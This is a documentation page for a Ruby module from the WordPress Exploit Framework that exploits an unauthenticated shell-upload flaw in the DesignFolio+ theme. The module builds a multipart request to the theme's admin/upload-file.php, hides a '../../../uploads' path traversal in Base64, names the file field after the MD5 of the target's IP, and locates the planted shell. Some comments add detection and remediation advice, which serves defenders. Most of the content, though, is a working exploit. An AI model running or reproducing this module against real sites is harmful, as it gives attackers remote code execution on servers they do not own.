class Wpxf::Exploit::DesignfolioPlusShellUpload
Public Class Methods
new()
Calls superclass method
Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/designfolio_plus_shell_upload.rb, line 8

# Sets up the module and registers its descriptive metadata.
#
# Runs the superclass initializer first, then hands the metadata to
# +update_info+. The references point at the public advisories for this
# issue (WPVDB 7880, EDB 36372), which is where a defender should look for
# affected-version and remediation details.
#
# NOTE(review): +date+ is presumably the disclosure date; confirm against
# the referenced advisories.
def initialize
  super

  module_info = {
    name: 'DesignFolio+ Theme Unauthenticated Shell Upload',
    author: [
      'CrashBandicot', # Vulnerability disclosure
      'rastating'      # WPXF module
    ],
    references: [
      ['WPVDB', '7880'],
      ['EDB', '36372']
    ],
    date: 'Mar 04 2015'
  }

  # Splatted so the call is equivalent to passing the keys inline.
  update_info(**module_info)
end
Public Instance Methods
check()
# File lib/wpxf/modules/exploit/shell/designfolio_plus_shell_upload.rb, line 25

# Checks the target by delegating to the readme-based theme version helper
# for the 'designfolio-plus' theme.
#
# No version bounds are passed here, so the verdict rests entirely on what
# +check_theme_version_from_readme+ does with only a theme slug.
# NOTE(review): that helper is defined outside this listing; confirm what it
# returns when the readme is missing or carries no version.
#
# @return whatever +check_theme_version_from_readme+ returns
def check
  theme_slug = 'designfolio-plus'
  check_theme_version_from_readme(theme_slug)
end
encoded_relative_path_to_uploads()
# File lib/wpxf/modules/exploit/shell/designfolio_plus_shell_upload.rb, line 33

# Returns the strict (no line breaks) Base64 encoding of the relative path
# '../../../uploads'.
#
# The value is sent as the +upload_path+ form field by
# +payload_body_builder+. Detection note: because the path is Base64-encoded,
# a filter that only looks for a literal '../' in request bodies will not see
# it; inspection has to decode the field first.
#
# @return [String] Base64 text of the relative uploads path
def encoded_relative_path_to_uploads
  relative_path = '../../../uploads'
  Base64.strict_encode64(relative_path)
end
payload_body_builder()
# File lib/wpxf/modules/exploit/shell/designfolio_plus_shell_upload.rb, line 37

# Assembles the request body for the upload request.
#
# The body carries two parts:
# * a file part whose field name is the MD5 of the target host's resolved
#   IP address, holding the encoded payload under +payload_name+;
# * an +upload_path+ field holding the Base64-encoded relative uploads path.
#
# NOTE(review): the MD5-of-IP field name is presumably what the theme's
# upload handler expects; the handler is not shown here, so confirm against
# the referenced advisories.
#
# Defensive reading: the destination directory is supplied by the client and
# contains parent-directory segments once decoded. A request body with an
# +upload_path+ field that decodes to a path containing '..' is the
# signature to alert on, and a handler that accepts a client-chosen
# destination is the thing to fix or remove.
#
# IPSocket.getaddress raises if the host name cannot be resolved; that error
# is not handled here and propagates to the caller.
#
# @return [Utility::BodyBuilder] the populated body builder
def payload_body_builder
  resolved_address = IPSocket.getaddress(target_host)
  file_field = Utility::Text.md5(resolved_address)

  Utility::BodyBuilder.new.tap do |body|
    body.add_file_from_string(file_field, payload.encoded, payload_name)
    body.add_field('upload_path', encoded_relative_path_to_uploads)
  end
end
uploaded_payload_location()
# File lib/wpxf/modules/exploit/shell/designfolio_plus_shell_upload.rb, line 47

# Builds the URL at which the uploaded file is expected: the WordPress
# uploads URL joined with the lower-cased payload name.
#
# NOTE(review): the +downcase+ suggests the server-side handler stores files
# under a lower-cased name; the handler is not shown here, so confirm.
#
# Incident-response note: the file sits directly under the uploads root
# rather than in a dated subdirectory, so an unexpected script file at that
# level is the on-disk artifact to look for. Disabling script execution in
# the uploads directory limits the impact of such a file.
#
# @return the value produced by +normalize_uri+ for the two segments
def uploaded_payload_location
  uploads_root = wordpress_url_uploads
  stored_name = payload_name.downcase
  normalize_uri(uploads_root, stored_name)
end
uploader_url()
# File lib/wpxf/modules/exploit/shell/designfolio_plus_shell_upload.rb, line 29

# Builds the URL of the theme's upload handler: the WordPress themes URL
# followed by 'designfolio-plus/admin/upload-file.php'.
#
# The module name describes the upload as unauthenticated, so any request to
# this path from a client without a logged-in session deserves attention in
# web-server logs. Removing the theme, or denying direct access to its
# +admin+ directory, closes the endpoint.
#
# @return the value produced by +normalize_uri+ for the joined segments
def uploader_url
  handler_segments = %w[designfolio-plus admin upload-file.php]
  normalize_uri(wordpress_url_themes, *handler_segments)
end